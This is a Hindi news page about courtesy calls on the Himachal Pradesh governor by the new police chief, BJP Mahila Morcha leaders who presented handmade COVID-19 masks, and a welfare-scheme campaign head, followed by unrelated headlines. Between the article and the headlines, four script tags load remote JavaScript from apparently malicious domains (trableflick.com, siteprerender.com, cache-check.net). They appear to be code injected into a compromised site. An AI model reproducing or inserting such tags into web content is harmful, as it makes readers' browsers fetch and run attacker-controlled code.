<p>नवनियुक्त पुलिस महानिदेशक संजय कुंडू ने आज राजभवन में राज्यपाल बंडारू दत्तात्रेय से भेंट की। उनकी यह एक शिष्टाचार भेंट थी। इसके बाद प्रदेश भाजपा महिला मोर्चा की नवनियुक्त अध्यक्ष रश्मि धर सूद ने मोर्चा की महासचिव शीतल व्यास और वन्दना गुलेरिया के साथ राज्यपाल से भेंट की। उन्होंने राज्यपाल को महिला मोर्चा द्वारा बनाए हैंडमेड मास्क भी भेंट किए। उन्होंने राज्यपाल को यह भी अवगत करवाया कि महिला मोर्चा के कार्यकर्ताओं द्वारा लोगों को लगभग 25 लाख मास्क बांटे गए हैं और 30 लाख मास्क बनाने का लक्ष्य रखा है। उन्होंने सेनेटाइजर वितरित करने के साथ-साथ कोविड-19 महामारी के बारे में लोगों को जागरूक भी किया है।</p>
<p>राज्यपाल ने हैंडमेड मास्क बनाने के उनके प्रयासों की सराहना की। उन्होंने मोर्चा की कार्यकर्ताओं से विशेषकर ग्रामीण क्षेत्र कि महिलाओं को सामाजिक दूरी, मास्क पहनना और हाथ धोने को अपनी दिनचर्या में शामिल करने आदि के बारे में शिक्षित करने का आग्रह किया। उन्होंनें आशा व्यक्त की कि उनके प्रयास भविष्य में भी जारी रहेंगे।</p>
<p>प्रधानमंत्री जन कल्याण योजना प्रचार प्रसार अभियान, हिमाचल प्रदेश के अध्यक्ष सुभाष शर्मा ने राज्यपाल से भेंट की और उन्हें ‘सबका साथ, सबका विकास, सबका विश्वास’ नामक पत्रिका भी भेंट की। इस पत्रिका में प्रधानमंत्री की जनकल्याण योजनाओं और नये प्रयासों की जानकारी उपलब्ध करवाई गई। इस मौके पर प्रदेश पीएमजेकेवाईपीपीए की प्रदेश सचिव सुधा मेहता भी इस अवसर पर उपस्थित थी।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1591091342323″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
धर्मशाला:जसवां प्रागपुर से भाजपा विधायक बिक्रम सिंह ने एमएचए की सिक्योरिटी लौटा दी है।…
शिलाई में वक्फ बोर्ड व अवैध तरीके से रह रहे लोगों का विरोध Shillai:…
New Delhi: एयर मार्शल अमर प्रीत सिंह को अगले Chief of the Air Staff…
गोपालपुर चिड़ियाघर बंद नहीं होगा। बल्कि अपग्रेड किया जा रहा है। चिड़ियाघर में व्यवस्थाएं…
धर्मशाला: कांगड़ा में शनिवार को दो हादसे हुए हैं। पहला हादसा बसनूर शाहपुर का…
हमीरपुर के दो संस्थानों में चोरी की वारदात लैपटॉप,नगदी और चांदी के सिक्के हुए चोरी…